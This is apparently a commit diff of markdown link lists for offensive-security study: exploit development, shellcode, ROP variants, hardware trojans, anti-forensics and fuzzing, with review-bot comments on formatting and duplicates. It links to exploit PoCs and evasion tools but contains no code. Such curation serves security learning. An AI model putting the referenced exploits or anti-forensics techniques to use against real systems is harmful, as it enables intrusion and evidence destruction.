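Review bot: two entries in this hunk are malformed or inconsistent. `| **NSA USB Playset - ShmooCon201** | https://www.youtube.com/watch?v=eTDBFpLYcGA` is a stray table-row format while the same talk appears further down as a normal `[NSA USB Playset - ShmooCon201](...)` link; keep only the link form, and the year is truncated to `201` in both copies. `[Metasploit Hardware Brdige]` misspells Bridge in both of its occurrences. Beyond that, the `General Hardware Hacking` list still mixes talks (Multiplexed Wired Attack Surfaces, Chip & PIN, Deconstructing the Circuit Board Sandwich, Hardware Hacking the Easyware Way), papers (The Sorcerer's Apprentice Guide to Fault Attacks, Smart Parking Meters) and tools (ChipWhisperer) even though this commit introduces dedicated `General Writeups/Articles`, `General Talks/Presentations` and `General Tools` headings; if that list survives the change, finish moving its entries into those sections so the categorization the commit message promises is actually complete.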
@ -144,8 +133,13 @@ http://greatscottgadgets.com/infiltrate2013/
[Hacking the D-Link DIR-890L](http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/)
[Multiple Vulnerabilities in BHU WiFi “uRouter”](http://blog.ioactive.com/2016/08/multiple-vulnerabilities-in-bhu-wifi.html)
#####TR-069
##### TR-069
[I Hunt TR-069 Admins - Pwning ISPs Like a Boss - Defcon 22](https://media.defcon.org/DEF%20CON%2022/DEF%20CON%2022%20video%20and%20slides/DEF%20CON%2022%20Hacking%20Conference%20Presentation%20By%20Shahar%20Tal%20-%20I%20Hunt%20TR%20-%20069%20Admins%20-%20Pwning%20ISPs%20Like%20a%20Boss%20-%20Video%20and%20Slides.m4v)
* [Related to TR-069](http://blog.3slabs.com/2012/12/a-brief-survey-of-cwmp-security.html)
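Review bot: the `#####TR-069` to `##### TR-069` change is correct (markdown needs the space for the heading to render), but the nested `Related to TR-069` link text says nothing about the target; the URL slug is `a-brief-survey-of-cwmp-security`, so a title along those lines would tell the reader what the post is.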
@ -442,9 +436,7 @@ Chameleon Mini
###<a name="papers">Papers</a>
###<a name="papers">General Papers</a>
[Stealthy Dopant-Level Hardware Trojans](Hardware level trojans http://sharps.org/wp-content/uploads/BECKER-CHES.pdf)
* Abstract: In this paper we propose an extremely stealthy approach for implement- ing hardware Trojans below the gate level, and we evaluate their impact on the security of the target device. Instead of adding additional cir- cuitry to the target design, we insert our hardware Trojans by changing the dopant polarity of existing transistors. Since the modi ed circuit ap- pears legitimate on all wiring layers (including all metal and polysilicon), our family of Trojans is resistant to most detection techniques, includ- ing ne-grain optical inspection and checking against \golden chips". We demonstrate the e ectiveness of our approach by inserting Trojans into two designs | a digital post-processing derived from Intel's cryp- tographically secure RNG design used in the Ivy Bridge processors and a side-channel resistant SBox implementation | and by exploring their detectability and their e ects on security.
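Review bot: the `Stealthy Dopant-Level Hardware Trojans` link is broken: the URL part reads `(Hardware level trojans http://sharps.org/wp-content/uploads/BECKER-CHES.pdf)`, so markdown will not render it as a link; drop the stray words and leave only the URL in the parentheses. The renamed `###<a name="papers">General Papers</a>` heading still has no space after `###`, the same rendering bug this commit fixes for `##### TR-069`. The abstract also carries PDF extraction artifacts worth cleaning: `implement- ing`, `modi ed`, `e ectiveness`, `\golden chips"`, and `|` where the paper had dashes.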
@ -464,7 +456,8 @@ Embedded Systems](http://www.cs.dartmouth.edu/~sws/pubs/bgjss12.pdf)
[Introduction to Trusted Execution Environments - Steven J. Murdoch](https://www.cl.cam.ac.uk/~sjm217/talks/rhul14tee.pdf)
[The Sorcerer’s Apprentice Guide to Fault Attacks](https://eprint.iacr.org/2004/100.pdf)
* The effect of faults on electronic systems has been studied since the 1970s when it was noticed that radioactive particles caused errors in chips. This led to further research on the effect of charged particles on silicon, motivated by the aerospace industry who was becoming concerned about the effect of faults in airborne electronic systems. Since then various mechanisms for fault creation and propagation have been discovered and researched. This paper covers the various methods that can be used to induce faults in semiconductors and exploit such errors maliciously. Several examples of attacks stemming from the exploiting of faults are explained. Finally a series of countermeasures to thwart these attacks are described.


+ 81
- 63
Draft/Exploit Development.md

@ -51,8 +51,6 @@ TOC
#### Sort:
[The Danger of Unrandomized Code](https://www.usenix.org/system/files/login/articles/105516-Schwartz.pdf)
Finding Opcodes
Methods of finding opcodes:
metasploit opcode DB
@ -62,62 +60,16 @@ pvefindaddr - mona.py
Corelan Exploit Series
[rex](https://github.com/shellphish/rex)
* Shellphish's automated exploitation engine, originally created for the Cyber Grand Challenge.
[Patcherex](https://github.com/shellphish/patcherex)
* Shellphish's automated patching engine, originally created for the Cyber Grand Challenge.
[DotNetToJScript](https://github.com/tyranid/DotNetToJScript)
* A tool to create a JScript file which loads a .NET v2 assembly from memory.
[Code segment encryption](http://blog.sevagas.com/?Code-segment-encryption)
[Hello MS08-067, My Old Friend!](https://labs.mwrinfosecurity.com/assets/BlogFiles/hello-ms08-067-my-old-friend.pdf)
[Trampolines in x64](http://www.ragestorm.net/blogs/?p=107)
[AV_Kernel_Vulns](https://github.com/bee13oy/AV_Kernel_Vulns)
* Pocs for Antivirus Software‘s Kernel Vulnerabilities
[GEF](https://github.com/hugsy/gef)
* GEF is a kick-ass set of commands for X86, ARM, MIPS, PowerPC and SPARC to make GDB cool again for exploit dev. It is aimed to be used mostly by exploiters and reverse-engineers, to provide additional features to GDB using the Python API to assist during the process of dynamic analysis and exploit development.
[CVE-2016-7255 - Git repo](https://github.com/mwrlabs/CVE-2016-7255)
[MSRC-Security-Research Github](https://github.com/Microsoft/MSRC-Security-Research/tree/master/presentations)
[Playing with canaries](https://www.elttam.com.au/blog/playing-with-canaries/)
[MS17-010](https://github.com/worawit/MS17-010)
* Add use-after-free section
[ShellcodeStdio](https://github.com/jackullrich/ShellcodeStdio)
* An extensible framework for easily writing debuggable, compiler optimized, position independent, x86 shellcode for windows platforms.
[gdbgui](https://github.com/cs01/gdbgui)
* A modern, browser-based frontend to gdb (gnu debugger). Add breakpoints, view stack traces, and more in C, C++, Go, and Rust. Simply run gdbgui from the terminal and a new tab will open in your browser.
[I-know-where-your-page-lives](https://github.com/IOActive/I-know-where-your-page-lives)
* I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016
[Crashing phones with Wi-Fi: Exploiting nitayart's Broadpwn bug (CVE-2017-9417)](http://boosterok.com/blog/broadpwn2/)
[Sigreturn Oriented Programming is a real Threat](https://subs.emis.de/LNI/Proceedings/Proceedings259/2077.pdf)
* Abstract: This paper shows that Sigreturn Oriented Programming (SROP), which consists of using calls to sigreturn to execute arbitrary code, is a pow erful method for the de velopment of exploits. This is demonstrated by developing two different kinds of SROP based exploits, one asterisk exploit which was already portrayed in the paper presenting SROP, and one novel exploit for a recently disclosed bug inthe DNS address resolution of the default GNUC library. Taking advantage of the fact, that these exploits have very few dependencies on the program being exploited, a library is implemented to automate wide parts of SROP exploit creation. This highlights the potential of SROP in respect to reusable and portable exploit code which strongly supports the conclusion of the original paper: SROP is areal threat!
[Playing with signals : An overview on Sigreturn Oriented Programming](https://thisissecurity.net/2015/01/03/playing-with-signals-an-overview-on-sigreturn-oriented-programming/)
[SROP | Signals, you say?](https://0x00sec.org/t/srop-signals-you-say/2890)
[EnglishmansDentist Exploit Analysis](https://blogs.technet.microsoft.com/srd/2017/07/20/englishmansdentist-exploit-analysis/)
[Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom’s Wi-Fi Chipsets](https://blog.exodusintel.com/2017/07/26/broadpwn/)
[Breaking the links: Exploiting the linker](https://www.nth-dimension.org.uk/pub/BTL.pdf)
#### end sort
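Review bot: `* Add use-after-free section` sits as a nested bullet under the `MS17-010` entry, so it reads as a description of that repo rather than a TODO; since this same diff introduces `Addendum: Use-After-Free` later in the file, the note can simply be dropped from whichever side of this hunk it survives on.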
@ -126,7 +78,7 @@ Corelan Exploit Series
[Hacking FinSpy - a Case Study - Atilla Marosi - Troopers15](https://www.youtube.com/watch?v=Mb4mfBi06K4)
[A brief history of Exploitation - Devin Cook](http://www.irongeek.com/i.php?page=videos/derbycon4/t514-a-brief-history-of-exploitation-devin-cook)
@ -159,6 +111,14 @@ Corelan Exploit Series
[Return-Oriented Programming without Returns](https://www.cs.uic.edu/~s/papers/noret_ccs2010/noret_ccs2010.pdf)
[Code segment encryption](http://blog.sevagas.com/?Code-segment-encryption)
[Trampolines in x64](http://www.ragestorm.net/blogs/?p=107)
[Playing with canaries](https://www.elttam.com.au/blog/playing-with-canaries/)
[gargoyle, a memory scanning evasion technique](https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html)
@ -186,7 +146,6 @@ This will allow you to transfer EIP control to a specified offset within a file
[Stack Smashing Protector](http://wiki.osdev.org/Stack_Smashing_Protector)
[gargoyle, a memory scanning evasion technique](https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html)
[BinTut](https://github.com/NoviceLive/bintut)
* Dynamic or live demonstration of classical exploitation techniques of typical memory corruption vulnerabilities, from debugging to payload generation and exploitation, for educational purposes
@ -308,14 +267,17 @@ I have tried to order the articles by technique and chronology.
* [Defeating DEP, the Immunity Debugger way, Pablo Sole,2008](http://www.immunitysec.com/downloads/DEPLIB.pdf)
* [The Case of Return-Oriented Programming and the AVC Advantage, 2009](http://www.usenix.org/event/evtwote09/tech/full_papers/checkoway.pdf)
* [Practical Return-Oriented Programming, Dino A. Dai Zovi, 2010](http://www.sourceconference.com/bos10pubs/Dino.pdf)
[Blind Return Oriented Programming (BROP)](http://www.scs.stanford.edu/~sorbo/brop/)
##### Blind ROP
* [Blind Return Oriented Programming (BROP)](http://www.scs.stanford.edu/~sorbo/brop/)
* The BROP attack makes it possible to write exploits without possessing the target's binary. It requires a stack overflow and a service that restarts after a crash. Based on whether a service crashes or not (i.e., connection closes or stays open), the BROP attack is able to construct a full remote exploit that leads to a shell. The BROP attack remotely leaks enough gadgets to perform the write system call, after which the binary is transferred from memory to the attacker's socket. Following that, a standard ROP attack can be carried out. Apart from attacking proprietary services, BROP is very useful in targeting open-source software for which the particular binary used is not public (e.g., installed from source setups, Gentoo boxes, etc.). The attack completes within 4,000 requests (within minutes) when tested against a toy proprietary service, and real vulnerabilities in nginx and MySQL.
* [Hacking Blind - BROP paper](http://www.scs.stanford.edu/~sorbo/brop/bittau-brop.pdf)
* [Blind Return Oriented Programming](http://www.scs.stanford.edu/brop/)
* [Blind Return Oriented Programming (BROP) Attack (1)](http://ytliu.info/blog/2014/05/31/blind-return-oriented-programming-brop-attack-yi/)
* [Blind Return Oriented Programming (BROP) Attack (2)](http://ytliu.info/blog/2014/06/01/blind-return-oriented-programming-brop-attack-er/)
##### Signal ROP
* [Sigreturn Oriented Programming is a real Threat](https://subs.emis.de/LNI/Proceedings/Proceedings259/2077.pdf)
* [Playing with signals : An overview on Sigreturn Oriented Programming](https://thisissecurity.net/2015/01/03/playing-with-signals-an-overview-on-sigreturn-oriented-programming/)
* [SROP | Signals, you say?](https://0x00sec.org/t/srop-signals-you-say/2890)
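Review bot: `Blind Return Oriented Programming (BROP)` appears twice at the top of this hunk, once unbulleted before the `##### Blind ROP` heading and once as its first bullet, and `http://www.scs.stanford.edu/brop/` and `http://www.scs.stanford.edu/~sorbo/brop/` point at the same project page; keep one unbulleted copy out and one URL. The three `Signal ROP` entries are also added again further down in this diff next to `Anti-Virus Software Gone Wrong`, so one of the two lists should go.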
### <a name="heap">Heap exploitation:</a>
------------------
@ -324,7 +286,7 @@ I have tried to order the articles by technique and chronology.
* [w00w00 on heap overflows, Matt Conover, 1999](http://w00w00.org/files/articles/heaptut.txt)
* [Vudo - An object superstitiously believed to embody magical powers, Michel "MaXX" Kaempf, 2001](http://www.phrack.com/issues.html?issue=57&id=8)
* [Once upon a free(), anonymous author, 2001\(http://www.phrack.com/issues.html?issue=57&id=9)
* [Once upon a free(), anonymous author, 2001](http://www.phrack.com/issues.html?issue=57&id=9)
* [Advanced Doug Lea's malloc exploits, jp, 2003](http://www.phrack.com/issues.html?issue=61&id=6)
* [Exploiting the wilderness, Phantasmal Phantasmagoria, 2004](http://www.derkeiler.com/Mailing-Lists/securityfocus/vuln-dev/2004-02/0024.html)
*[Malloc Maleficarum, Phantasmal Phantasmagoria, 2005](http://www.packetstormsecurity.org/papers/attack/MallocMaleficarum.txt)
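Review bot: the `Once upon a free()` fix is right (`2001\(http...` broke the markdown link), but the same hunk leaves `*[Malloc Maleficarum, Phantasmal Phantasmagoria, 2005]` with no space after the asterisk, so that line will not render as a list item; add the space while here.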
@ -453,8 +415,11 @@ Other:
*
### <a name="uaf">Addendum: Use-After-Free</a>
------------------
* [An Introduction to Use After Free Vulnerabilities](https://www.purehacking.com/blog/lloyd-simon/an-introduction-to-use-after-free-vulnerabilities)
* [Exploit writing tutorial part 11 : Heap Spraying Demystified](https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/)
* [Part 9: Spraying the Heap [Chapter 2: Use-After-Free] – Finding a needle in a Haystack](https://www.fuzzysecurity.com/tutorials/expDev/11.html)
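Review bot: the bare `*` under `Other:` is an empty list item and should be removed. The Corelan part 11 and FuzzySecurity part 9 heap-spraying links added to this Use-After-Free addendum are added again later in this diff under `##### Corelan` and `###### FuzzySecurity`; if both placements are intended, one should say why it belongs under UAF, since the titles themselves are about heap spraying.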
@ -474,13 +439,30 @@ Other:
[shellcode tutorials](http://projectshellcode.com/?q=node/12)
[rex](https://github.com/shellphish/rex)
* Shellphish's automated exploitation engine, originally created for the Cyber Grand Challenge.
[Patcherex](https://github.com/shellphish/patcherex)
* Shellphish's automated patching engine, originally created for the Cyber Grand Challenge.
[ShellcodeStdio](https://github.com/jackullrich/ShellcodeStdio)
* An extensible framework for easily writing debuggable, compiler optimized, position independent, x86 shellcode for windows platforms.
[Shellcode Time: Come on Grab Your Friends](http://www.irongeek.com/i.php?page=videos/derbycon4/t116-shellcode-time-come-on-grab-your-friends-wartortell)
* Packed shellcode is a common deterrent against reverse engineering. Mainstream software will use it in order to protect intellectual property or prevent software cracking. Malicious binaries and Capture the Flag (CTF) challenges employ packed shellcode to hide their intended functionality. However, creating these binaries is an involved process requiring significant experience with machine language. Due to the complexity of creating packed shellcode, the majority of samples are painstakingly custom-created or encoded with very simple mechanisms, such as a single byte XOR. In order to aid in the creation of packed shellcode and better understand how to reverse engineer it, I created a tool to generate samples of modular packed shellcode. During this talk, I will demonstrate the use of the shellcode creation tool and how to reverse engineer the binaries it creates. I will also demonstrate an automated process for unpacking the binaries that are created.
[Writing my first shellcode - iptables -P INPUT ACCEPT](https://0day.work/writing-my-first-shellcode-iptables-p-input-accept/)
Windows Kernel Shellcode on Windows 10
* [Windows Kernel Shellcode on Windows 10 – Part 1](https://improsec.com/blog//windows-kernel-shellcode-on-windows-10-part-1)
* [Windows Kernel Shellcode on Windows 10 – Part 2](https://improsec.com/blog//windows-kernel-shellcode-on-windows-10-part-2)
* [Windows Kernel Shellcode on Windows 10 – Part 3](https://improsec.com/blog//windows-kernel-shellcode-on-windows-10-part-3)
* [Windows Kernel Shellcode on Windows 10 – Part 4 - There is No Code](https://improsec.com/blog//windows-kernel-shellcode-on-windows-10-part-4-there-is-no-code)
Introduction to Windows Shellcode Development
* [Introduction to Windows shellcode development – Part 1](https://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/)
* [Introduction to Windows shellcode development – Part 2](https://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/)
* [Introduction to Windows shellcode development – Part 3](https://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/)
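Review bot: `rex` and `Patcherex` are automated exploitation and patching engines, not shellcode tools, so they sit oddly between `shellcode tutorials` and `ShellcodeStdio`; the earlier hunk removes them from the `Sort:` block, and a tools section is the better destination. `Windows Kernel Shellcode on Windows 10` and `Introduction to Windows Shellcode Development` are plain text lines used as group labels; a sub-heading like the `##### Corelan` header added later in this diff would render them as such.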
@ -515,6 +497,24 @@ AVM Fritz!Box root RCE: From Patch to Metasploit Module
[Tracking Down Heap Overflows with rr](https://sean.heelan.io/2016/05/31/tracking-down-heap-overflows-with-rr/)
[QuickZip Stack BOF 0day: a box of chocolates](https://www.corelan.be/index.php/2010/03/27/quickzip-stack-bof-0day-a-box-of-chocolates/)
##### Corelan
* [Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s[TM] Cube](https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/)
* [Exploit writing tutorial part 11 : Heap Spraying Demystified](https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/)
###### FuzzySecurity
* [Part 9: Spraying the Heap [Chapter 2: Use-After-Free] – Finding a needle in a Haystack](https://www.fuzzysecurity.com/tutorials/expDev/11.html)
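Review bot: heading levels are inconsistent here: `##### Corelan` is level 5 while `###### FuzzySecurity` is level 6, so FuzzySecurity renders as a child of Corelan; make both `#####`.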
@ -588,6 +588,11 @@ AVM Fritz!Box root RCE: From Patch to Metasploit Module
### <a name="obfus">Obfuscation</a>
[Obfuscating python](https://reverseengineering.stackexchange.com/questions/1943/what-are-the-techniques-and-tools-to-obfuscate-python-programs)
@ -742,6 +747,7 @@ https://www.exploit-db.com/docs/18482.pdf
[Proposed Windows 10 EAF/EMET "Bypass" for Reflective DLL Injection](https://zerosum0x0.blogspot.com/2017/06/proposed-eafemet-bypass-for-reflective.html?m=1)
[I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016](https://github.com/IOActive/I-know-where-your-page-lives)
@ -928,7 +934,8 @@ fREedom is a primitive attempt to provide an IDA Pro independent means of extrac
[sandbox-attacksurface-analysis-tools](https://github.com/google/sandbox-attacksurface-analysis-tools)
* This is a small suite of tools to test various properties of sandboxes on Windows. Many of the checking tools take a -p flag which is used to specify the PID of a sandboxed process. The tool will impersonate the token of that process and determine what access is allowed from that location. Also it's recommended to run these tools as an administrator or local system to ensure the system can be appropriately enumerated.
[DotNetToJScript](https://github.com/tyranid/DotNetToJScript)
* A tool to create a JScript file which loads a .NET v2 assembly from memory.
@ -990,6 +997,9 @@ fREedom is a primitive attempt to provide an IDA Pro independent means of extrac
[PEDA](https://github.com/longld/peda)
* PEDA - Python Exploit Development Assistance for GDB
[gdbgui](https://github.com/cs01/gdbgui)
* A modern, browser-based frontend to gdb (gnu debugger). Add breakpoints, view stack traces, and more in C, C++, Go, and Rust. Simply run gdbgui from the terminal and a new tab will open in your browser.
[GEF - GDB Enhanced Features](https://github.com/hugsy/gef)
* GEF is aimed to be used mostly by exploiters and reverse-engineers. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis or exploit development.
* Why not PEDA?
@ -1070,7 +1080,8 @@ Metasploit
[Anti-Virus Software Gone Wrong](http://uninformed.org/?v=all&a=21&t=sumry)
* Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default configuration of newly-sold computer systems. As a result, it is becoming increasingly important that anti-virus software be well-designed, secure by default, and interoperable with third-party applications. Software that is installed and running by default constitutes a prime target for attack and, as such, it is especially important that said software be designed with security and interoperability in mind. In particular, this article provides examples of issues found in well-known anti-virus products. These issues range from not properly validating input from an untrusted source (especially within the context of a kernel driver) to failing to conform to API contracts when hooking or implementing an intermediary between applications and the underlying APIs upon which they rely. For popular software, or software that is installed by default, errors of this sort can become a serious problem to both system stability and security. Beyond that, it can impact the ability of independent software vendors to deploy functioning software on end-user systems.
[Sigreturn Oriented Programming is a real Threat](https://subs.emis.de/LNI/Proceedings/Proceedings259/2077.pdf)
* Abstract: This paper shows that Sigreturn Oriented Programming (SROP), which consists of using calls to sigreturn to execute arbitrary code, is a pow erful method for the de velopment of exploits. This is demonstrated by developing two different kinds of SROP based exploits, one asterisk exploit which was already portrayed in the paper presenting SROP, and one novel exploit for a recently disclosed bug inthe DNS address resolution of the default GNUC library. Taking advantage of the fact, that these exploits have very few dependencies on the program being exploited, a library is implemented to automate wide parts of SROP exploit creation. This highlights the potential of SROP in respect to reusable and portable exploit code which strongly supports the conclusion of the original paper: SROP is areal threat!
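Review bot: this `Sigreturn Oriented Programming is a real Threat` entry duplicates the first item of the `Signal ROP` list added earlier in this diff; keep one. The abstract also has extraction errors to repair: `pow erful`, `de velopment`, `inthe`, `GNUC library` (GNU C library) and `areal threat`.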
@ -1163,9 +1174,16 @@ When run on a machine vulnerable to the rowhammer problem, the process was able
[The Weak Bug - Exploiting a Heap Overflow in VMware](http://acez.re/the-weak-bug-exploiting-a-heap-overflow-in-vmware/)
[Hello MS08-067, My Old Friend!](https://labs.mwrinfosecurity.com/assets/BlogFiles/hello-ms08-067-my-old-friend.pdf)
[Crashing phones with Wi-Fi: Exploiting nitayart's Broadpwn bug (CVE-2017-9417)](http://boosterok.com/blog/broadpwn2/)
[EnglishmansDentist Exploit Analysis](https://blogs.technet.microsoft.com/srd/2017/07/20/englishmansdentist-exploit-analysis/)
[Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom’s Wi-Fi Chipsets](https://blog.exodusintel.com/2017/07/26/broadpwn/)
[English Shellcode](http://web.cs.jhu.edu/~sam/ccs243-mason.pdf)
* History indicates that the security community commonly takes a divide-and-conquer approach to battling malware threats: identify the essential and inalienable components of an attack, then develop detection and prevention techniques that directly target one or more of the essential components. This abstraction is evident in much of the literature for buffer overflow attacks including, for instance, stack protection and NOP sled detection. It comes as no surprise then that we approach shellcode detection and prevention in a similar fashion. However, the common belief that components of polymorphic shellcode (e.g., the decoder) cannot reliably be hidden suggests a more implicit and broader assumption that continues to drive contemporary research: namely, that valid and complete representations of shellcode are fundamentally different in structure than benign payloads. While the first tenet of this assumption is philosoph- ically undeniable (i.e., a string of bytes is either shellcode or it is not), truth of the latter claim is less obvious if there exist encoding techniques capable of producing shellcode with features nearly indistinguishable from non-executable content. In this paper, we challenge the assumption that shellcode must conform to superficial and discernible representations. Specifically, we demonstrate a technique for automatically producing English Shellcode, transforming arbitrary shellcode into a representation that is superficially similar to English prose. The shellcode is completely self-contained - i.e., it does not require an external loader and executes as valid IA32 code)—and can typically be generated in under an hour on commodity hardware. Our primary objective in this paper is to promote discussion and stimulate new ideas for thinking ahead about preventive measures for tackling evolutions in code-injection attacks
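Review bot: the `English Shellcode` abstract has a hyphenation artifact (`philosoph- ically`) and an unmatched closing parenthesis after `executes as valid IA32 code`, which has no opening one; drop it. The MS08-067, Broadpwn and EnglishmansDentist entries here are the ones removed from `Sort:` at the top of this file's diff, which is fine as long as they are not left in both places.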


Draft/Building A Pentest Lab/Lab Buffer Overflows.txt → Draft/Exploit_Dev_Lab.txt


+ 6
- 6
Draft/Forensics Incident Response.md

@ -20,22 +20,18 @@
* Better security - Mean time to detect/Mean time to respond
* Better security -> Mean time to detect/Mean time to respond
#### CULL
* Roll anti into this.
https://forensiccontrol.com/resources/free-software/
Forensics wiki
Yelp/Github - OSX Collector - Mass style forensics/management
hackingexposedcomputerforensicsblog.blogspot.com/2015/02/automating-dfir-how-to-series-on_21.html)
[THE CIDER PRESS:EXTRACTING FORENSIC ARTIFACTS FROM APPLE CONTINUITY](https://www.sans.org/summit-archives/file/summit-archive-1498146226.pdf)
#### End Cull
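Review bot: `hackingexposedcomputerforensicsblog.blogspot.com/2015/02/automating-dfir-how-to-series-on_21.html)` ends in a `)` with no matching `[`/`(` and has no scheme, so it neither renders as a link nor copies cleanly; drop the `)` or wrap it as a proper link. `* Roll anti into this.` is a note to self and should say what is meant (anti-forensics, presumably, given the `An Anti-Forensics Primer` entry in the next hunk). The `->` change in the mean-time-to-detect line is fine.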
@ -268,8 +264,12 @@ http://windowsir.blogspot.com/2013/11/sniper-forensics-memory-analysis-and.html
[usbkill](https://github.com/stemid/usbkill)
* A tool that shuts down your computer if USB devices change, for example if you unplug or plug-in a device.
[An Anti-Forensics Primer - Jason Andress](http://www.irongeek.com/i.php?page=videos/derbycon3/s216-an-anti-forensics-primer-jason-andress)
* This talk will cover the basics of anti-forensics, the tools and techniques that can be used to make life harder for computer forensic examiners. We will cover some of the basic methods that are used (disk wiping, time stomping, encryption, etc…) and talk about which of these methods might actually work and which are easily surmounted with common forensic tools.
[OpenPuff Steganography](http://embeddedsw.net/OpenPuff_Steganography_Home.html)
[Forensics Impossible: Self-Destructing Thumb Drives - Brandon Wilson](https://www.youtube.com/watch?v=NRMqwc5YEu4)


+ 2
- 2
Draft/Fuzzing Bug Hunting.md

@ -51,8 +51,6 @@ https://raw.githubusercontent.com/secfigo/Awesome-Fuzzing/master/README.md
[Youtube Playlist of Fuzzing Videos](https://www.youtube.com/playlist?list=PLtPrYlwXDImiO_hzK7npBi4eKQQBgygLD)
### Blogposts
[Fools of Golden Gate](https://blog.silentsignal.eu/2017/05/08/fools-of-golden-gate/)
@ -173,6 +171,8 @@ https://raw.githubusercontent.com/secfigo/Awesome-Fuzzing/master/README.md
[Upping Your Bug Hunting Skills Using Symbolic Virtual Machines by Anto - x33fcon](https://www.youtube.com/watch?v=IPSZxGaLlyk)
[Practical File Format Fuzzing](http://www.irongeek.com/i.php?page=videos/derbycon3/3301-practical-file-format-fuzzing-jared-allar)
* File format fuzzing has been very fruitful at discovering exploitable vulnerabilities. Adversaries take advantage of these vulnerabilities to conduct spear-phishing attacks. This talk will cover the basics of file format fuzzing and show you how to use CERT’s fuzzing frameworks to discovery vulnerabilities in file parsers.
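Review bot: `to discovery vulnerabilities` in the talk summary should read `to discover vulnerabilities`.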


+ 2
- 1
Draft/Game Hacking.md

@ -20,6 +20,7 @@
http://douevenknow.us/post/151129092928/throwback-k9lhax-by-bruteforce
#### End Sort
#### Writeups
@ -31,7 +32,7 @@ http://douevenknow.us/post/151129092928/throwback-k9lhax-by-bruteforce
[Remote Code Execution In Source Games](https://oneupsecurity.com/research/remote-code-execution-in-source-games?t=r)
[Gotta catch-em-all worldwide - Pokemon GO GPS spoofing](https://insinuator.net/2016/07/gotta-catch-em-all-worldwide-or-how-to-spoof-gps-to-cheat-at-pokemon-go/)
### Console Hacking


Draft/Interesting Things Useful stuff/Writeup of Gamma Group Hack.txt → Draft/Gamma_group_hack_writeup.txt


+ 17
- 23
Draft/Interesting Things Useful stuff.md

@ -40,28 +40,12 @@ http://spth.virii.lu/articles.htm
[303 Hacks Lies Nation States Mario DiNatale](https://www.youtube.com/watch?v=nyh_ORq1Qwk)
[Richard Thieme - The Impact of Dark Knowledge and Secrets on Security and Intelligence Professionals](https://www.youtube.com/watch?v=0MzcPBAj88A&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe)
* Dismissing or laughing off concerns about what it does to a person to know critical secrets does not lessen the impact on life, work, and relationships of building a different map of reality than “normal people” use. One has to calibrate narratives to what another believes. One has to live defensively, warily. This causes at the least cognitive dissonance which some manage by denial. But refusing to feel the pain does not make it go away. It just intensifies the consequences when they erupt.
Philip K. Dick said, reality is that which, when you no longer believe in it, does not go away. When cognitive dissonance evolves into symptoms of traumatic stress, one ignores those symptoms at one’s peril. But the very constraints of one’s work often make it impossible to speak aloud about those symptoms, because that might threaten one’s clearances, work, and career. And whistle blower protection is often non-existent.
[recap](https://github.com/rackerlabs/recap)
* recap is a reporting script that generates reports of various information about the server.
[Paul Rascagneres - Modern Reconnaissance Phase by APT – Protection Layer](https://www.youtube.com/watch?v=4JVrK7bRKb0&index=10&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe)
[BE YOUR OWN VPN PROVIDER WITH OPENBSD (v2)](https://networkfilter.blogspot.com/2017/04/be-your-own-vpn-provider-with-openbsd-v2.html)
[New cache architecture on Intel I9 and Skylake server: An initial assessment](https://cyber.wtf/2017/07/18/new-cache-architecture-on-intel-i9-and-skylake-server-an-initial-assessment/)
[301 The Road to Hiring is Paved in Good Intentions Tim OBrien](https://www.youtube.com/watch?v=sdkf8SIj1rU)
[Ermahgerd: Lawrs - Robert Heverly - Anycon17](http://www.irongeek.com/i.php?page=videos/anycon2017/305-ermahgerd-lawrs-prof-robert-heverly)
* When do you ? and other coders, hackers, developers, and tinkerers ? think or worry about the law? If your answer is, ?Not very often,? then this talk is for you. We all need to think about the law. And it?s not just privacy, or computer fraud, or even anti-circumvention law, that we should think about. We need to think about law as a whole and how it can help us do or stop us from doing what we want to do. This talk will start with a broad overview of the ways in which we implicate law when we do what we do, and then will focus on what that means for us and the broader implications that can arise from our various activities. Do you think the law would stop you from doing what you want to do or punish you for doing it? It might, but it also might not. If you think it does, do you think you should be able to do what you want to do? If you do, then we need to hack the law, and to do that we?ll need to talk to the legal coders, those writers of our cultural software. This talk will tackle not only law and working with code, but also why it matters for us to be aware of the law and engaged in improving it.
[QR Code interesting](http://datagenetics.com/blog/november12013/index.html)
[Manuals Library](https://www.manualslib.com/)
@ -70,14 +54,8 @@ Philip K. Dick said, reality is that which, when you no longer believe in it, do
[IA Guidance - NSA](https://www.iad.gov/iad/library/ia-guidance/index.cfm)
[LeakedSource.ru](https://leakedsource.ru/)
#### End Sort
@ -249,6 +227,22 @@ http://www.securitywizardry.com/radar.htm
[Software Supply Chains and the Illusion of Control - Derek Weeks](http://www.irongeek.com/i.php?page=videos/bsidesnova2017/107-software-supply-chains-and-the-illusion-of-control-derek-weeks)
* In this presentation I am sharing the results of a three-year, industry-wide study on open source development and security practices across 3,000 organizations and 25,000. I will detail how these organizations are employing a vast community of open source component suppliers, warehouses, and development tools that take the form of software supply chains. Modern software development practices are now consuming BILLIONS of open source and third-party components. The tooling with package managers and build tools such as Maven, Gradle, npm, NuGet, RubyGems and others has promoted the usage of components to a convenient standard practice. As a result, 90% of a typical application is now composed of open source components. The good news: use of the components is improving developer productivity and accelerating time to market. However, using these components brings ownership and responsibility with it and this fact is largely overlooked. The unspoken truth: not all parts are created equal. For example, 1 in 16 components in use include known security vulnerabilities. Ugh. This session aims to enlighten development professionals by sharing results from the 